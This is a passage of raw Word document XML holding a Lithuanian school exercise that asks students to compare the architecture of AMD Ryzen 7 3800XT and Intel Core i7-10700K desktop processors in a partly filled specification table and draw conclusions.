          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="59B51863" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kelių ga</w:t>
      </w:r>
      <w:r w:rsidR="18F9B934" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mintojų</w:t>
      </w:r>
      <w:r w:rsidR="000F5639" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D56FDC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000F5639" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INTEL, AMD arba analogiškus</w:t>
      </w:r>
      <w:r w:rsidR="00FF2CD8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kitų gamintojų</w:t>
      </w:r>
      <w:r w:rsidR="00D56FDC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="2D2C8776" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> stacionarių kompiuterių</w:t>
      </w:r>
      <w:r w:rsidR="18F9B934" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> procesorius ir palygi</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="18F9B934" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jų architektūrą (</w:t>
      </w:r>
      <w:r w:rsidR="5421C1A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PVZ. AMD RYZEN 7 3800X</w:t>
      </w:r>
      <w:r w:rsidR="77CCAF2B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="5421C1A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir </w:t>
      </w:r>
      <w:r w:rsidR="307EE92B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INTEL Core i7-10700K</w:t>
      </w:r>
      <w:r w:rsidR="638F16C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. U</w:t>
      </w:r>
      <w:r w:rsidR="18F9B934" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>žpildy</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidR="18F9B934" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>lentelę</w:t>
      </w:r>
      <w:r w:rsidR="370CAC5D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir parašy</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="370CAC5D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> išvadas</w:t>
      </w:r>
      <w:r w:rsidR="60616E66" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="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980"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="1980"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4052A3EA" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="1A03E0EE" w14:textId="58BDF53F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="112F2DBD" w14:textId="6E869FF1" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD RYZEN 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23CCB0E1" w14:textId="3DB2E147" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3800XT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2E5C21BC" w14:textId="12793D08" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>INTEL Core i7-10700K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4A902C71" w14:textId="58595C60" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="2CBDBECC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>INTEL</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="31064949" w14:textId="7B40B82F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="2CBDBECC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="25811107" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2D5E1DB1" w14:textId="54BEB9AF" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Technologija </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2F1E6C" w14:textId="50272662"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TSMC 7nm FinFET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF8DB5C" w14:textId="08F86C93"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Intel 14+++ nm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="054FF77A" w14:textId="3D69F741" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E053DBB" w14:textId="253F46C4" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="174168E5" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="58B24B14" w14:textId="5FC2AB9A" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Architektūra </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C6D0466" w14:textId="078A91FE"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Zen2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71EE2C6A" w14:textId="6A0F6702"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Comet Lake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FCB0BCE" w14:textId="6BEF983B" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69645CE0" w14:textId="61B00DD6" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="16CA0E48" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="16B87CA8" w14:textId="57B4905B" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lizdas (Socket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BFB9560" w14:textId="3A0FB511"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AM4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A03CE91" w14:textId="07A21D5A"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FCLGA1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F186A1A" w14:textId="714CC6CE" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC8DCAE" w14:textId="2973C71F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="66169ACF" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2F0E0F82" w14:textId="15A1CDB2" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Branduolių/gijų sk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF300C2" w14:textId="59AAB485"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8/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC3381F" w14:textId="04DC3E5E"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8/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393D971D" w14:textId="10514CC8" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32BB79D1" w14:textId="19FB43B7" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0DD311FB" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="13FBA59B" w14:textId="7216CD55" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Taktinis dažnis (Turbo Boost)GHz </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC283B2" w14:textId="576179A7"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3.9GHz/ 4.5GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C412A52" w14:textId="5184E205"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3.80 GHz /5.10 GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C671890" w14:textId="71DFB84C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D721E6" w14:textId="2EAE3DB0" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="3F56D931" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5BB20861" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0A1AB93B" w14:textId="7921AD07" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
